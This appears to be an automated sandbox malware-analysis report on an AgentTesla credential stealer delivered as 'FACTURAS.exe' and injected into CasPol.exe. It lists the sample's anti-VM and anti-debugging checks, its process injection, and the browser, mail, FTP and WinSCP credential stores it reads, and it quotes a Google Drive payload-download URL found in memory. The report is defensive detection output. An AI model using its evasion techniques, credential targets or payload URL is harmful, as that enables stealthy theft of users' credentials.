Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\FACTURAS.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: FACTURAS.exe, 00000000.00000002.2779665465.0000000003120000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
Source: FACTURAS.exe, 00000000.00000002.2779665465.0000000003120000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7334475913.0000000000E30000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: FACTURAS.exe, 00000000.00000002.2777688692.00000000005BD000.00000004.00000020.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: CasPol.exe, 0000000D.00000002.7334475913.0000000000E30000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=150165GSKZ9-M3FAHFFVN26GKULRYSZPU
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3996 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_0041724F rdtsc 0_2_0041724F
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9948 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe System information queried: ModuleInformation Jump to behavior
Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: CasPol.exe, 0000000D.00000002.7334475913.0000000000E30000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=150165GSkz9-m3FahfFvn26gkuLRySZPu
Source: CasPol.exe, 0000000D.00000002.7335956710.0000000001002000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW8
Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 0000000D.00000002.7336567127.0000000001034000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: FACTURAS.exe, 00000000.00000002.2779665465.0000000003120000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7334475913.0000000000E30000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: FACTURAS.exe, 00000000.00000002.2779725495.00000000031E9000.00000004.00000001.sdmp, CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: FACTURAS.exe, 00000000.00000002.2777688692.00000000005BD000.00000004.00000020.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: FACTURAS.exe, 00000000.00000002.2779665465.0000000003120000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
Source: CasPol.exe, 0000000D.00000002.7341559645.0000000002BB9000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\FACTURAS.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\FACTURAS.exe Code function: 0_2_0041724F rdtsc 0_2_0041724F
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\FACTURAS.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00936950 KiUserExceptionDispatcher,LdrInitializeThunk, 13_2_00936950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\FACTURAS.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: C20000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\FACTURAS.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe" Jump to behavior
Source: C:\Users\user\Desktop\FACTURAS.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe" Jump to behavior
Source: CasPol.exe, 0000000D.00000002.7340987079.0000000001761000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000015.00000002.7335370516.000001EB84ED1000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: CasPol.exe, 0000000D.00000002.7340987079.0000000001761000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000015.00000002.7335370516.000001EB84ED1000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: CasPol.exe, 0000000D.00000002.7340987079.0000000001761000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000015.00000002.7335370516.000001EB84ED1000.00000002.00020000.sdmp Binary or memory string: Progman
Source: CasPol.exe, 0000000D.00000002.7340987079.0000000001761000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000015.00000002.7335370516.000001EB84ED1000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 1028, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 1028, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000D.00000002.7349511763.000000001DD21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 1028, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs